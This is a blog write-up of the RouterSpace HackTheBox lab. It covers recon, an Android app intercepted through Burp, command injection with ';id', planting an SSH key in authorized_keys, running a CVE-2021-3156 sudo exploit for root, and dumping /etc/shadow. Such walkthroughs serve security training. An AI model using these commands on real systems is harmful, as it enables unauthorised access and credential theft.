RouterSpace HackTheBox WalkThrough
This is RouterSpace HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted RouterSpace HackTheBox
machine. Before starting, let us know something about this machine. It is Linux OS
box with IP address 10.10.11.148
and difficulty Easy
assigned by its maker.
First of all, connect your PC with HackTheBox VPN
and confirm your connectivity with RouterSpace Box by pinging its IP 10.10.11.148
. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. As usual I have used $ nmap
[a popular port scanner] for this task and the result is given below: –
Scanning
$ nmap -p- --min-rate=10000 -oN fulltcp-scan.nmap 10.10.11.148
$ sudo nmap -p22,80 -sV -sC -oN ScriptScan.nmap 10.10.11.148
———-SNIP———
Nmap
found port no 22 and 80 as open. OpenSSH_8.2p1
is running on port 22
and Node.js Server
is running on port 80
[ which I got to know after getting inside the RouterSpace box]. Before entering into the enumeration of this machine let us add routerspace.htb
host to our hosts
file. The advantage of it is that if there will be virtual hosting enabled
then we would get some other website to enumerate on. The hosts
file is present inside directory /etc/
of our Kali/Parrot machine.
Host File After Modification
$ cat /etc/hosts
Since web server is running on port 80
so we have two URLs to check viz. http://10.10.11.148 and http://routerspace.htb. Ongoing to each URL separately found the same web page which confirms that there is no any virtual hosting enabled on this server. We are free to use any URL while hunting. I will use http://routerspace.htb throughout the walkthrough.
Ongoing to http://routerspace.htb found a download button which contain an APK
file named RouterSpace.apk
. Downloaded it and we will reverse engineer
it when will not get anything interesting on http://routerspace.htb.
Performed directory bruteforce with $ dirsearch
using wordlist directory-list-2-3-medium.txt
& vhost bruteforce with $ gobuster
using wordlist subdomains-top1million-110000.txt
but did not find any special directory and virtual host. Checked the page-source
of the webpage at http://routerspace.htb for some type of hint
but did not get anything interesting. Till now I didn’t get anything interesting which helps me to proceed further.
As we have already downloaded the apkfile
so let us install it in any android enumerator
and play with it. I am going to use $ anbox
which is an open-source android emulator for Linux OS. I have used this link for installation of anbox on my Kali OS.
Install & Configure AnBox
$ sudo apt install anbox
$ sudo modprobe ashmem_linux
$ sudo modprobe binder_linux
$ sudo /sbin/modprobe ashmem_linux
$ sudo /sbin/modprobe binder_linux
$ wget https://build.anbox.io/android-images/2018/07/19/android_amd64.img
$ sudo mv android_amd64.img /var/lib/anbox/android.img
$ sudo service anbox-container-manager restart
$ anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity
We have successfully installed the anbox emulator
. Let us install $ adb
tool using which we will access the emulator and install the app RouterSpace.apk
into it. And also configure the proxy setting to capture the request of RouterSpace application.
Installing adb & Configuring Proxy
$ sudo apt install adb
————-SNIP————-
$ adb devices # To list the attached devices
$ adb -s emulator-5558 install ~/Downloads/RouterSpace.apk # To install RouterSpace apk
$ adb -s emulator-5558 shell settings put global http_proxy 192.168.250.1:8081 # To configure burp proxy
We have set the proxy to address 192.168.250.1:8081
where 192.168.250.1
is gateway address of anbox0
interface and 8081
is the port where Burpsuite will be listening. Also configure the Burpsuite proxy to listen on port 8081
as shown in the screenshot given below.
If you are having issue in finding the gateway address of your anbox
in Burpsuite, you can configure the Burpsuite proxy to listen on all interfaces as shown in the screenshot given below. It will also work.
Once everything is configured launch the anbox manager
by the below command or simply by searching anbox
in start menu.
$ anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity
Turn on the intercept in Burpsuite and open the RouterSpace
application. Click on Check Status
button.
Note: If you are getting connection error and anbox is taking too long time to start then you can restart the anbox manger service by the command
$ sudo service anbox-container-manager restart
. This can resolve the start problem.
After intercepting the request got an IP in JSON
format. This reminded me of Command Injection
vulnerability which I have previously exploited in DVWA web application . I have also written a post on DVWA Command Injection. Read the post here for more info on Command Injection vulnerability.
After trying some basic command injection payloads found that it is vulnerable to OS Command Injection vulnerability.
Confirming OS Command Injection
Simply use the concatenating string ;id
after the IP address 0.0.0.0
and you will get the id
of user paul
.
Getting User Shell
Now, we have confirmed OS Command Injection vulnerability. My next step is to get reverse shell on my kali machine using some one-liner. Tried different one-liners but none of them worked [you can generate multiple one-liners from here]. This may be due to the reason that nc
, curl
, wget
& bash
commands were not allowed to communicate using remote address. Didn’t know exactly what the issue was.
Then I pasted my SSH-Public
key in authorized_keys
file of user paul
and using my private key
I got user shell.
Note: If authorized_keys file doesn’t exit then create one.
$ ssh-keygen -f key
$ cat key.pub
$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwI9EZqYqEZQBfb5dQyeB56MKMR37fojC8yKzceNFgqbZO4Ry8p1tIlzy/C6X81w4uGM+egoBKIDPYnYSeCZefOF2FoI7TxPT0+Jq1jY6NIxnVXUd8H2j4+MPTAM7NQJTrP01kC3NeKK6SfQJ8JLSLyzmbjfCnrl5n5RiX2rFef522ISNEy8ecV7rNFjf9VKnduzMwPHNxbLIxjyuURgzOuLFKXtaQ7T6XAht6wFLCDNSHD/5eWaMGMOvGK8OmInl/fbHSGHT5LjOuR4/JQGNP8BD91C4Ne4rgYj4O40QSv9OgWdwyPEkzcdfk9luFqx5PB75MnMp0PICoNOiNlziUByiQFwGm9DRz98wYXAOH5ivcqtmFDVadrjZ3qwvQ3nMxrFqiS4b2l43+0lQ6h+OR379O6XSsKQY/S4rhKuev7JdXeY7WA3CZQu8bVbxQHi6uYFWprqgDTrMZy24PgcMQDDjjvxwpz/rVslMwAz5MOS+fc/m3hXBKaUYxUrhL9TM= deepak@kali'>>/home/paul/.ssh/authorized_keys
$ chmod 600 key
$ ssh -i key [email protected]
$ whoami && id
We have successfully got user shell as paul. Let us capture user flag from user.txt
file.
Capture User Flag
$ cat user.txt
Privilege Escalation
To escalate the privilege to root we have to first find a Privilege Escalation Vector
using which we can perform privilege escalation. We can find PrivEsc Vector either manually or using some post exploitation enumeration scripts like linpeas.sh, LinEnum.sh and there are a lot more. This time I will go with LinPEAS viz. script enumeration technique.
Finding PrivEsc Vector
LinPEAS found that Sudo
version is vulnerable. After googling Sudo 1.8.31 exploit
, found that Sudo
before 1.9.5p2
contains an off-by-one error that can result in a heap-based buffer overflow
[CVE-2021-3156], which allows privilege escalation to root via $ sudoedit -s
and a command-line argument that ends with a single backslash character.
For more details about this vulnerability check this article from qualys
and its working exploit can be found here. When I tried to escalate the privilege using the exploit present at latter link, I could easily get root shell. So, here our PrivEsc Vector is Privilege Escalation by exploiting Vulnerable Sudo version
.
Simply make three files by the name hax.c
, lib.c
& Makefile
. Put the content from this exploit. in the respective files. And at last, execute the $ make
command as shown below.
$ nano hax.c
$ nano lib.c
$ nano Makefile
$ ls
$ make
$ ./sudo-hax-me-a-sandwich 1
# whoami && id
We have successfully got root shell. Let us capture root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted to RouterSpace HackTheBox machine. Learnt a lot during this walkthrough. Hope you would have also learnt some new things. Thanks for reading this writeup. Share your experience in the comment section. Want to give any suggestion about the writeup feel free to write us at [email protected]. Check out my latest articles at https://ethicalhacs.com/.
Dumping Root Hash
# cat /etc/shadow | grep root